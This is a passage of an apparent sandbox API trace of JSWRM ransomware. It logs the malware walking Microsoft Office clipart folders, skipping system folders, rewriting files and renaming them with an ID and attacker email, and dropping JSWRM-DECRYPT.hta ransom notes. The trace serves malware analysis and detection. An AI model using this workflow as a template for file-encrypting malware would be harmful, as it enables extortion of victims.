lpString2="$RECYCLE.BIN") returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", lpString2="system volume information") returned 1 [0099.847] lstrcmpiW (lpString1="WNTER_01.MID", lpString2="msocache") returned 1 [0099.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WNTER_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WNTER_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WNTER_01.MID", lpUsedDefaultChar=0x0) returned 12 [0099.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0099.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WNTER_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WNTER_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WNTER_01.MID", lpUsedDefaultChar=0x0) returned 12 [0099.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0099.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0099.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.848] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wnter_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.848] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6915) returned 1 [0099.848] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b00) returned 0x205850 [0099.848] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b00, lpOverlapped=0x0) returned 1 [0099.850] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.850] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b00, lpOverlapped=0x0) returned 1 [0099.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.850] CloseHandle (hObject=0x314) returned 1 [0099.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0099.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0099.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0099.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0099.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0099.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0099.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.851] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WNTER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wnter_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WNTER_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wnter_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0099.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0099.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.852] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b03, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WNTER_01.MID", cAlternateFileName="")) returned 0 [0099.852] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0099.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0099.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0099.852] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2=".") returned 1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2="..") returned 1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2="...") returned 1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2="windows") returned -1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2="recovery") returned -1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2="perflogs") returned 1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2="documents and settings") returned 1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2="$RECYCLE.BIN") returned 1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2="system volume information") returned -1 [0099.852] lstrcmpiW (lpString1="Publisher", lpString2="msocache") returned 1 [0099.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0099.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0099.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0099.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0099.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0099.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0099.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\jswrm-decrypt.hta")) returned 0xffffffff [0099.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0099.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0099.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0099.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0099.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24d210 [0099.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0099.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24ba88 [0099.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0099.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0099.854] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.854] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0099.855] CloseHandle (hObject=0x45c) returned 1 [0099.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0099.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0099.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0099.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0099.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0099.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0099.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0099.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bda8 [0099.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0099.855] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\jswrm-decrypt.hta")) returned 0x20 [0099.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0099.855] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0099.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0099.855] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x322db73c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0099.855] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0099.855] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x322db73c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="..", cAlternateFileName="")) returned 1 [0099.856] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0099.856] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0099.856] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2=".") returned 1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2="..") returned 1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2="...") returned 1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2="windows") returned -1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2="recovery") returned -1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2="perflogs") returned -1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2="documents and settings") returned -1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2="$RECYCLE.BIN") returned 1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2="system volume information") returned -1 [0099.856] lstrcmpiW (lpString1="Backgrounds", lpString2="msocache") returned -1 [0099.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0099.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0099.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0099.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0099.856] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0099.856] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0099.856] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\jswrm-decrypt.hta")) returned 0xffffffff [0099.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0099.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.857] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d210 [0099.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efe0 [0099.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0099.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0099.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0099.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0099.857] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.858] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.858] WriteFile (in: hFile=0x314, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0099.859] CloseHandle (hObject=0x314) returned 1 [0099.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0099.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efe0 | out: hHeap=0x1e0000) returned 1 [0099.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0099.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0099.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0099.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0099.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0099.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0099.860] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\jswrm-decrypt.hta")) returned 0x20 [0099.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0099.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0099.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0099.860] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x322db73c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0099.860] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0099.860] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x322db73c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="..", cAlternateFileName="")) returned 1 [0099.860] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0099.860] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0099.860] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11030b47, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11030b47, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11030b47, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf77, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="J0143743.GIF", cAlternateFileName="")) returned 1 [0099.860] lstrcmpiW (lpString1="J0143743.GIF", lpString2=".") returned 1 [0099.860] lstrcmpiW (lpString1="J0143743.GIF", lpString2="..") returned 1 [0099.860] lstrcmpiW (lpString1="J0143743.GIF", lpString2="...") returned 1 [0099.860] lstrcmpiW (lpString1="J0143743.GIF", lpString2="windows") returned -1 [0099.860] lstrcmpiW (lpString1="J0143743.GIF", lpString2="recovery") returned -1 [0099.860] lstrcmpiW (lpString1="J0143743.GIF", lpString2="perflogs") returned -1 [0099.860] lstrcmpiW (lpString1="J0143743.GIF", lpString2="documents and settings") returned 1 [0099.860] lstrcmpiW (lpString1="J0143743.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.860] lstrcmpiW (lpString1="J0143743.GIF", lpString2="system volume information") returned -1 [0099.861] lstrcmpiW (lpString1="J0143743.GIF", lpString2="msocache") returned -1 [0099.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0099.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143743.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143743.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143743.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0099.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0099.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143743.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0143743.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0143743.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0099.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0099.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0099.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 